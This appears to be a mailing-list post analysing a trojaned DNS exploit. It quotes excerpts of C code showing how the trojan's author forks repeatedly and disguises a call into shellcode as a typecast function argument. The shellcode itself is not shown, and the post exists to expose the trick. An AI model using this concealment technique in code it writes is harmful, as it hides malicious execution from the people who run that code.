Below I have excerpted the obvious pieces of the trojan. The functions
which do the deed are set_ptr, and the call to dnsprintflabel.
I just thought some people may have wanted to know how the person who
wrote the trojan hid the shellcode among the seemingly correct exploit.
--Perry
***
*** set_ptr does the fork dance.
***
int
set_ptr(char *buff, int offset, unsigned long val, int s)
{
if (!fork())
***
*** After the above fork, child does meaningless memcpy and
*** returns to main, causing multiple executions of the trojan
*** shellcode.
***
memcpy(buff, copy_buff, sizeof(copy_buff));
return 0;
}
***
*** dnsprintflabel has a lot of crap code in it, but it
*** isn't this function that does the deed, it's the
*** arguments to the function.
***
/* pull out a compressed query name */
char *
dnsprintflabel(char *s, char *buf, char *p)
{
return (p);
}
***
*** This is the actual code that does the running of the shellcode.
*** In it he hides a lot of useless casts to hide the inline prototype
*** of the call to the shellcode.
***
/*
* encode packet ...
*/
dnsprintflabel(remote_addr, (char *) (expl_buffer + sizeof(HEADER)),
(char *) ((unsigned long) &expl_buffer[0] + sizeof(HEADER) + 1));
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
This is the carefully typecasted prototype for the shellcode, he
just skips all the header and pointer crap to actually run the
shellcode. The &expl_buffer[0] + sizeof(HEADER) + 1 is actually
just the shellcode he copied from the buffers above, hidden behind
some custom types and stuff.
EXPLANATION: The & dereference just returns the pointer of the array
element at the calculated offset (sizeof(HEADER) +1). The thing that
gives this away as a function call is the extra set of parentheses
after the typecast, this is the lexicon for an inline function
typecast.
--
Perry Harrington Director of zelur xuniL ()
[EMAIL PROTECTED] System Architecture Think Blue. /\
PGP signature
